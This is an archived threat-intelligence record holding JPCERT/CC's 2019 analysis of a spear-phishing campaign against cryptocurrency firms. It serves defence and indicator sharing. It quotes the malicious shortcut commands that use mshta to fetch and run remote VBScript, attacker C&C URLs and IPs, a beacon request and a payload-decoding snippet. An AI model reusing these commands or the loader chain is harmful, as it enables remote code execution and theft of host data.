{
	"id": "b651fb9c-d613-45bc-bf80-9b16c9ac6dd1",
	"created_at": "2026-04-06T00:12:24.788039Z",
	"updated_at": "2026-04-10T03:20:47.034504Z",
	"deleted_at": null,
	"sha1_hash": "ba1c4911dca547ebb72d117976003c062d17a96e",
	"title": "Spear Phishing against Cryptocurrency Businesses - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 596763,
	"plain_text": "Spear Phishing against Cryptocurrency Businesses - JPCERT/CC\r\nEyes\r\nBy JPCERT/CC\r\nPublished: 2019-07-08 · Archived: 2026-04-05 21:07:59 UTC\r\nAs of June 2019, JPCERT/CC has observed targeted emails to some Japanese organisations. These emails contain\r\na URL to a cloud service and convince recipients to download a zip file which contains a malicious shortcut file.\r\nThis article will describe the details of the attack method.\r\nHow the VBScript downloader is launched\r\nThe zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut\r\nfile “Password.txt.lnk”. This shortcut file contains some commands, and they run when the file is executed. The\r\nbelow image illustrates the flow of events from the shortcut file being executed until the VBScript-based\r\ndownloader is launched.\r\nFigure 1： Flow of events from running the shortcut file to infecting a host\r\nhttps://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html\r\nPage 1 of 8\n\nThe shortcut file contains the following command:\r\nC:\\Windows\\System32\\mshta.exe https://bit.ly/31O88c3\r\nWhen a user accesses the shortened URL, they will be redirected to the following site, and an HTML file\r\ncontaining the VBScript (Figure 2) is downloaded.\r\nhttp://service.amzonnews.club:8080/open?id=3F%2BE7HwXzwMRiysADDAgev15bAPluuPYB%2BufUnqYMCw%3D\r\nFigure 2： HTML file downloaded by the shortcut file\r\nThe behaviour of the VBScript is described in Figure 3. First, it creates and displays a text file that contains the\r\npassword for the decoy document. Then, it creates a VBS file (oezjrjua.vbs) in %TEMP% directory and executes\r\nit. It also lists the processes running in the environment and checks whether any of them contains specific strings\r\n(\"hudongf\" or \"qhsafe\"). If these are not included, then a shortcut file (xBoxOne.lnk) is created in the Startup\r\nfolder. 
It is assumed that this check looks for strings contained in the process names of Qihoo 360 security products (zhudongfangyu.exe, qhsafemain.exe).\r\nFigure 3： Behaviour of VBScript in the HTML file\r\nDetails of xBoxOne.lnk\r\nxBoxOne.lnk is a shortcut file and contains the following command:\r\nC:\\Windows\\System32\\mshta.exe https://bit.ly/2SGs76y\r\nWhen a user accesses the shortened URL, they are redirected to the following site:\r\nhttp://update.gdrives.top:8080/open?id=b7hMO0D%2ByNbNZSqXu4Putub%2BZLLqg/S66Foz0YKUjety914cQmWz32MV6B\r\nThis shortcut file is created in the Startup folder and is executed when the user logs in. As of 26 June 2019, JPCERT/CC was not able to confirm the details of the site as the hostname could not be resolved.\r\nDetails of oezjrjua.vbs\r\noezjrjua.vbs is a downloader which sends a POST request every 3 minutes and executes the received data as VBScript. The following is an example.\r\nPOST /open?topics=s9[random 3-digit numeric] HTTP/1.1\r\nAccept: */*\r\nAccept-Language: ja\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .N\r\nHost: 75.133.9.84:8080\r\nContent-Length: 7426\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n200\r\nDetails of VBScript downloaded by oezjrjua.vbs\r\nJPCERT/CC has confirmed that the VBScript (Figure 4) is received and executed in response to the POST request from oezjrjua.vbs.\r\nFigure 4： VBScript executed by oezjrjua.vbs (snipped)\r\nThe executed VBScript collects information about the infected device and sends it to the attacker’s server every minute. 
The following information is sent:\r\nUsername\r\nHost name\r\nOS version\r\nOS install date\r\nOS run time\r\nTime zone\r\nCPU name\r\nExecution path of oezjrjua.vbs\r\nNetwork adapter information\r\nList of running processes\r\nIf the response to the data contains “20”, encoded data will be downloaded. It can be decoded with the following code (res holds the server response):\r\nn=InStr(1,res,\"#\") ' Finds the # separator in the response\r\nkey=CLng(\"\u0026h\" \u0026 Mid(res,1,n-1)) ' Extracts the hex key that precedes #\r\npsc=Mid(res,n+1,Len(res)-n) ' Extracts the encoded data that follows #\r\nsc=base64dec(psc) ' Base64 decoding (1st time)\r\npsc=CStr(xor(sc,key)) ' XOR processing with the key\r\nNStep=base64dec(psc) ' Base64 decoding (2nd time)\r\nThe decoded data is expected to be VBScript, and it will be executed when it is correctly decoded. As of now, we have no clue about what kind of malware will be downloaded as a result since the encoded data is not accessible. It is assumed that attackers would inject some malicious files according to the victim’s environmental information.\r\nAccess to the shortened URL\r\nJPCERT/CC observed a limited number of accesses to the shortened URL (Figure 5). This implies that the attack was conducted against a very limited range of targets.\r\nFigure 5： Access counts to the shortened URL (snipped)\r\nIn closing\r\nIn this series of attacks, we have observed that attackers change some parts of the encoding and conditions for each attempt. It is likely that this type of attack continues with some customisation. Details about the shortcut file are available in Appendix A, the list of samples in Appendix B and the C\u0026C servers in Appendix C. The hash values and C\u0026C servers of some variants are listed in Appendices D and E. Please make sure that none of your devices is communicating with the C\u0026C servers listed in Appendix C or E. 
These samples were mostly decoy documents with subjects about cryptocurrency. We are aware that some of these documents have been sent to organisations that are related to cryptocurrencies. We assume that this attack campaign specifically targets cryptocurrency operators and related entities.\r\nTomoaki Tani\r\n(Translated by Yukako Uchida)\r\nAppendix A Shortcut file information\r\nTable 1: Information contained in the shortcut file 1\r\nDrive serial number: fe42-66e0\r\nNetBIOS name: desktop-6hpdfg4\r\nMAC address: 94:b8:6d:42:68:1d\r\nTable 2: Information contained in the shortcut file 2\r\nDrive serial number: 1aee-e0bd\r\nNetBIOS name: desktop-m9r59ro\r\nMAC address: 74:27:ea:25:d6:11\r\nAppendix B SHA-256 Hash value of the samples\r\nAppendix C List of C\u0026C servers\r\nservice.amzonnews.club\r\n75.133.9.84\r\nupdate.gdrives.top\r\ngoogledrive.network\r\nAppendix D SHA-256 Hash value of the similar samples\r\nUpdate: Nov 20, 2019\r\nAppendix E C\u0026C servers of the similar samples\r\nUpdate: Nov 20, 2019\r\nSource: https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html"
	],
	"report_names": [
		"spear-phishing-against-cryptocurrency-businesses.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434344,
	"ts_updated_at": 1775791247,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ba1c4911dca547ebb72d117976003c062d17a96e.pdf",
		"text": "https://archive.orkl.eu/ba1c4911dca547ebb72d117976003c062d17a96e.txt",
		"img": "https://archive.orkl.eu/ba1c4911dca547ebb72d117976003c062d17a96e.jpg"
	}
}